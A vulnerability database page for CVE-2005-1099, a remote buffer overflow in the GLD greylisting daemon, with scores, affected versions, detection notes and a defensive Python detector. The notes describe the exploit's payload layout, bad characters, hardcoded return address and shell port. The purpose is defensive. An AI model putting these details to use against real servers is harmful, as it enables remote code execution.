CVE-2005-1099
published 2005-04-12

Priority: P2 · 62
CVSS 2.0: 10.0 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 67.66% (99.2th percentile)
Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.

Affected (7 ranges)

Vendor      | Product     | Version range                  | Fixed in
debian      | postfix-gld | < postfix-gld 1.5-1 (bookworm) | postfix-gld 1.5-1 (bookworm)
salim_gasmi | gld         | (not listed)                   | (not listed)
salim_gasmi | gld         | (not listed)                   | (not listed)
salim_gasmi | gld         | (not listed)                   | (not listed)
salim_gasmi | gld         | (not listed)                   | (not listed)
salim_gasmi | gld         | (not listed)                   | (not listed)
salim_gasmi | gld         | (not listed)                   | (not listed)

Detection & IOCs (extracted from sources)

port: 2525
port: 36864
command: sender=<payload>\r\nclient_address=<ret_addr x300>\r\n\r\n
  • The exploit targets TCP port 2525 (GLD greylisting daemon). Monitor for unexpected or malformed connections to this port, especially from non-Postfix sources.
  • The exploit payload is delivered via the 'sender=' field, followed by a 'client_address=' field padded with 300 repetitions of a return address. Detect anomalously large or malformed GLD protocol messages containing these fields.
  • Successful exploitation results in a reverse/bind shell on TCP port 36864. Monitor for unexpected outbound or inbound connections on port 36864 from the GLD host.
  • The exploit's bad characters (bytes the payload encoder must avoid) are the null byte, newline, carriage return, space, and equals sign. IDS signatures should look for long binary strings in GLD protocol fields that lack these characters.
  • The vulnerability resides in the HandleChild function in server.c of GLD 1.3 and 1.4. Process-level monitoring for crashes or unexpected child-process spawning by the GLD daemon is advised.
  • The vulnerability is only exploitable when GLD is configured to listen on a network interface (not just localhost). Default or localhost-only deployments are not remotely exploitable.
  • The Metasploit module only includes a target for RedHat Linux 7.0 (Guinness) with a hardcoded return address (0xbfffa5d8). Exploitation against other distributions requires adjusted return addresses.
  • GLD 1.5-1 resolves this vulnerability in Debian. Ensure the patched version is deployed.
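As an added defender-side example (not code from this page, from GLD or from the Metasploit module), the following Python checks GLD-style protocol messages for the anomalies the notes above describe: oversized or binary 'sender=' / 'client_address=' fields. The length threshold, the sample messages and the function names are assumptions.

```python
import re

# Threshold is an assumption: a legitimate client_address is an IP literal
# (at most 45 chars for IPv6) and a sender is an e-mail address, whereas
# 300 copies of a 4-byte return address is ~1200 bytes.
MAX_FIELD_LEN = 256
WATCHED_FIELDS = {"sender", "client_address"}

def parse_gld_message(raw: bytes) -> dict:
    """Split a CRLF-delimited key=value message (terminated by a blank
    line) into a dict.  Values stay as bytes so binary content survives."""
    body = raw.split(b"\r\n\r\n", 1)[0]
    fields = {}
    for line in body.split(b"\r\n"):
        if b"=" not in line:
            continue
        key, _, value = line.partition(b"=")
        fields[key.decode("ascii", "replace")] = value
    return fields

def find_anomalies(raw: bytes) -> list:
    """Return (field, reason) findings; an empty list means nothing odd."""
    findings = []
    for key, value in parse_gld_message(raw).items():
        if key not in WATCHED_FIELDS:
            continue
        if len(value) > MAX_FIELD_LEN:
            findings.append((key, f"length {len(value)} > {MAX_FIELD_LEN}"))
        # Anything outside printable ASCII has no place in an address field.
        if re.search(rb"[^\x20-\x7e]", value):
            findings.append((key, "non-printable bytes"))
    return findings

# Constructed samples (not captured traffic).
BENIGN = b"sender=alice@example.org\r\nclient_address=203.0.113.7\r\n\r\n"
# client_address stuffed with 300 copies of a 4-byte printable marker
OVERSIZED = b"sender=bob@example.net\r\nclient_address=" + b"XXXX" * 300 + b"\r\n\r\n"
# sender carrying high-bit bytes that avoid CR, LF, space, NUL and '='
BINARY = b"sender=" + bytes(range(0x80, 0xA8)) + b"\r\nclient_address=198.51.100.2\r\n\r\n"

if __name__ == "__main__":
    for name, msg in (("benign", BENIGN), ("oversized", OVERSIZED), ("binary", BINARY)):
        print(name, find_anomalies(msg))
```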

CVSS provenance

Source        | Version | Score | Severity | Vector
nvd           | 2.0     | 10.0  | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C
osv           |         | 10.0  | CRITICAL |
vendor_debian |         | 10.0  | CRITICAL |